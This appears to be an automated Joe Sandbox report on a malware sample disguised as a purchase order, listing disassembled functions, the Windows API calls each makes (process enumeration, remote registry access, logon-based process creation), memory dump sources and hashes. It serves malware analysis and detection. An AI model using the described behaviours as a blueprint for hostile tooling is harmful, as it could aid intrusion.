                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Rect$Client$Window$Screen
                      • String ID:
                      • API String ID: 1296646539-0
                      • Opcode ID: 8e5f12fa2d2d348adcd67b08b1d31f98df3f0e6b4e5cac6b734a2c976879ef82
                      • Instruction ID: 24cffc152942ba06710fe18684ee6a66c0c08aa3b0f1b072e4261de4b3d5c75d
                      • Opcode Fuzzy Hash: 8e5f12fa2d2d348adcd67b08b1d31f98df3f0e6b4e5cac6b734a2c976879ef82
                      • Instruction Fuzzy Hash: 1BB14D7990024ADBEF10CFA8C5807EDBBB1FF09710F149569EC69EB295DB34A940CB64
                      Function 00AD9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$__itow__swprintf
                      • String ID:
                      • API String ID: 3253778849-0
                      • Opcode ID: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                      • Instruction ID: 215c560de5bdc1a4a784d893a71f10655db4ff5e9c993f0caced5101ab085af9
                      • Opcode Fuzzy Hash: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                      • Instruction Fuzzy Hash: 5961BB3061020AAFCF05EF64CE82EFF37A9AF45304F04455AF85A6B292EB34D905CB51
                      Function 00AF1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00AF1B09
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00AF1B17
                      • __wsplitpath.LIBCMT ref: 00AF1B45
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcscat.LIBCMT ref: 00AF1B5A
                      • Process32NextW.KERNEL32(00000000,?), ref: 00AF1BD0
                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00AF1BE2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                      • String ID:
                      • API String ID: 1380811348-0
                      • Opcode ID: 6c6e8120977651fec325e8ba18273f37e0c45c2ce9df1d018d4795c32cf685ca
                      • Instruction ID: 4a7dd3fd3337e33719f94296b3440a26eecb156625e86acf62c223c6c570cc29
                      • Opcode Fuzzy Hash: 6c6e8120977651fec325e8ba18273f37e0c45c2ce9df1d018d4795c32cf685ca
                      • Instruction Fuzzy Hash: 33517D71504304AFD720EF64C985EABB7ECEF89754F00491EF58997291EB70EA05CBA2
                      Function 00AF2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2FA0
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2FE0
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AF3003
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AF302C
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AF306F
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF307C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                      • String ID:
                      • API String ID: 4046560759-0
                      • Opcode ID: 77bd834ecfabadbf604c500384cdc016202bbfe02b0a9053062e5fc01b6280f5
                      • Instruction ID: da0f706ab87dce8cea50c38d95943bef1182f50efcc6191a70a1cb352257fa87
                      • Opcode Fuzzy Hash: 77bd834ecfabadbf604c500384cdc016202bbfe02b0a9053062e5fc01b6280f5
                      • Instruction Fuzzy Hash: CA515A322182049FCB05EFA4C995E6FB7F9BF88314F04491EF646872A1DB71EA15CB52
                      Function 00AADB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscpy$_wcscat
                      • String ID:
                      • API String ID: 2037614760-0
                      • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                      • Instruction ID: 9d612a68bf617f92cd06da002f3852ed67ed8a1c9ea7b5934279fe912c3ec4b6
                      • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                      • Instruction Fuzzy Hash: AF511530A04215AACF21AFA8C5419FDB7B4FF06720F90804AF5C2AB6D2DBB45F42D790
                      Function 00AD2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00AD2AF6
                      • VariantClear.OLEAUT32(00000013), ref: 00AD2B68
                      • VariantClear.OLEAUT32(00000000), ref: 00AD2BC3
                      • _memmove.LIBCMT ref: 00AD2BED
                      • VariantClear.OLEAUT32(?), ref: 00AD2C3A
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AD2C68
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType_memmove
                      • String ID:
                      • API String ID: 1101466143-0
                      • Opcode ID: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                      • Instruction ID: feae901e2471d483c860df602e2918fdce712d629a3b64223a389cfa5dc2cb78
                      • Opcode Fuzzy Hash: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                      • Instruction Fuzzy Hash: 6D517EB5A00209EFDB24CF58C880AAAB7F8FF5C314B15855AE95ADB310D734E951CFA0
                      Function 00AF82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenu.USER32(?), ref: 00AF833D
                      • GetMenuItemCount.USER32(00000000), ref: 00AF8374
                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AF839C
                      • GetMenuItemID.USER32(?,?), ref: 00AF840B
                      • GetSubMenu.USER32(?,?), ref: 00AF8419
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AF846A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Item$CountMessagePostString
                      • String ID:
                      • API String ID: 650687236-0
                      • Opcode ID: 2a8264a678eea49f87b3fc7cc075f1ba531f412569769d7a23b7fdaa49aa79bd
                      • Instruction ID: 4dc03cf1c00c3d0fa6fb55f95622a9e8ec413596e514aa6f83a79b728ed6c4a2
                      • Opcode Fuzzy Hash: 2a8264a678eea49f87b3fc7cc075f1ba531f412569769d7a23b7fdaa49aa79bd
                      • Instruction Fuzzy Hash: 35517C75A0061AAFCF11EFA4CA41AAEB7F4EF48710F108459F915BB351DB38AE418B90
                      Function 00AD54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AD552E
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5579
                      • IsMenu.USER32(00000000), ref: 00AD5599
                      • CreatePopupMenu.USER32 ref: 00AD55CD
                      • GetMenuItemCount.USER32(000000FF), ref: 00AD562B
                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AD565C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                      • String ID:
                      • API String ID: 3311875123-0
                      • Opcode ID: 90e490f09b1a2fe8a548c1dfc72db7f070d512f2f3198795bf9185c6527e8dc9
                      • Instruction ID: 34fff60ed098ef29b97f98b334402f817218801ace02236730f5ca077c657990
                      • Opcode Fuzzy Hash: 90e490f09b1a2fe8a548c1dfc72db7f070d512f2f3198795bf9185c6527e8dc9
                      • Instruction Fuzzy Hash: 3A51BA70A00A09ABDF21CF78D988BAEBBF6AF15318F58421AE4069B390D770D944CB51
                      Function 00AAB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AAB1C1
                      • GetWindowRect.USER32(?,?), ref: 00AAB225
                      • ScreenToClient.USER32(?,?), ref: 00AAB242
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AAB253
                      • EndPaint.USER32(?,?), ref: 00AAB29D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                      • String ID:
                      • API String ID: 1827037458-0
                      • Opcode ID: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                      • Instruction ID: 2059bf27615d5950d27d4954b7579ecdb8465cb2db13ecb92d48faf32597968d
                      • Opcode Fuzzy Hash: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                      • Instruction Fuzzy Hash: BD418F711043019FD721DF28DC84BBA7BE8EB56724F1406A9F995872E2CB3198459B61
                      Function 00AFE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                      Download Yara Rule
                      APIs
                      • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE21B
                      • EnableWindow.USER32(00000000,00000000), ref: 00AFE23F
                      • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE29F
                      • ShowWindow.USER32(00000000,00000004,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE2B1
                      • EnableWindow.USER32(00000000,00000001), ref: 00AFE2D5
                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AFE2F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      • Opcode ID: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                      • Instruction ID: 942685d9362ddae41c3b45d59edce3e8d8b46c977b2e159c3ca6d0b2e66e182d
                      • Opcode Fuzzy Hash: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                      • Instruction Fuzzy Hash: E6411A34601249EFDF26CF94C499BE47BE5BB0A314F1881A9FA588F2B2D731A845CB51
                      Function 00ACBC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ACBCD9
                      • OpenProcessToken.ADVAPI32(00000000), ref: 00ACBCE0
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00ACBCEF
                      • CloseHandle.KERNEL32(00000004), ref: 00ACBCFA
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ACBD29
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00ACBD3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                      • Instruction ID: 5e2a2cba3ab374beb9f19054727aed479d006214aefc72cd74276710e1491a94
                      • Opcode Fuzzy Hash: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                      • Instruction Fuzzy Hash: 8D214F72115209BBDF029F98ED4AFDE7BA9EF08315F058019FA01A6160CB76DE61DB60
                      Function 00AFE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                        • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AFE9F2
                      • LineTo.GDI32(00000000,00000003,?), ref: 00AFEA06
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFEA14
                      • LineTo.GDI32(00000000,00000000,?), ref: 00AFEA24
                      • EndPath.GDI32(00000000), ref: 00AFEA34
                      • StrokePath.GDI32(00000000), ref: 00AFEA44
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                      • String ID:
                      • API String ID: 43455801-0
                      • Opcode ID: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                      • Instruction ID: 44cfa833079546820c2d977700fb0bb3b35ebfefc11ff42f2c5cb2c914537ec9
                      • Opcode Fuzzy Hash: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                      • Instruction Fuzzy Hash: E811F77600014DBFDB129F94DC88EEA7FADEB08355F048422FA099A1A0DB719D559BA0
                      Function 00ACEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 00ACEFB6
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ACEFC7
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ACEFCE
                      • ReleaseDC.USER32(00000000,00000000), ref: 00ACEFD6
                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ACEFED
                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00ACEFFF
                        • Part of subcall function 00ACA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00ACA79D,00000000,00000000,?,00ACAB73), ref: 00ACB2CA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CapsDevice$ExceptionRaiseRelease
                      • String ID:
                      • API String ID: 603618608-0
                      • Opcode ID: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                      • Instruction ID: ead854f8f1b5797a5af9bfacff70bf58e2d6cf521f8d046a53a899a83ca94403
                      • Opcode Fuzzy Hash: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                      • Instruction Fuzzy Hash: 21016C75A00315BFEB109BA59C45F5EBFB8EB48751F108069FD04E7290DA709D11CF61
                      Function 00AB87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                      Download Yara Rule
                      APIs
                      • __init_pointers.LIBCMT ref: 00AB87D7
                        • Part of subcall function 00AB1E5A: __initp_misc_winsig.LIBCMT ref: 00AB1E7E
                        • Part of subcall function 00AB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AB8BE1
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AB8BF5
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AB8C08
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AB8C1B
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AB8C2E
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AB8C41
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AB8C54
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AB8C67
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AB8C7A
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AB8C8D
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AB8CA0
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AB8CB3
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AB8CC6
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AB8CD9
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AB8CEC
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00AB8CFF
                      • __mtinitlocks.LIBCMT ref: 00AB87DC
                        • Part of subcall function 00AB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00B4AC68,00000FA0,?,?,00AB87E1,00AB6AFA,00B467D8,00000014), ref: 00AB8AD1
                      • __mtterm.LIBCMT ref: 00AB87E5
                        • Part of subcall function 00AB884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AB87EA,00AB6AFA,00B467D8,00000014), ref: 00AB89CF
                        • Part of subcall function 00AB884D: _free.LIBCMT ref: 00AB89D6
                        • Part of subcall function 00AB884D: DeleteCriticalSection.KERNEL32(00B4AC68,?,?,00AB87EA,00AB6AFA,00B467D8,00000014), ref: 00AB89F8
                      • __calloc_crt.LIBCMT ref: 00AB880A
                      • GetCurrentThreadId.KERNEL32 ref: 00AB8833
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                      • String ID:
                      • API String ID: 2942034483-0
                      • Opcode ID: 4c63d4b27d8428b77d864abd9c5716601199184fb2068a6e9bd5b37ea1a621b4
                      • Instruction ID: ad7e55b539d33b5085afbfa151fee82edddc35be92537350a12d31cfdc9929aa
                      • Opcode Fuzzy Hash: 4c63d4b27d8428b77d864abd9c5716601199184fb2068a6e9bd5b37ea1a621b4
                      • Instruction Fuzzy Hash: 13F0903211A7515AF2247B7C7E17ACA26CC9F02BB4B650A2AF464D60D3FF188881C160
                      Function 00ADA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
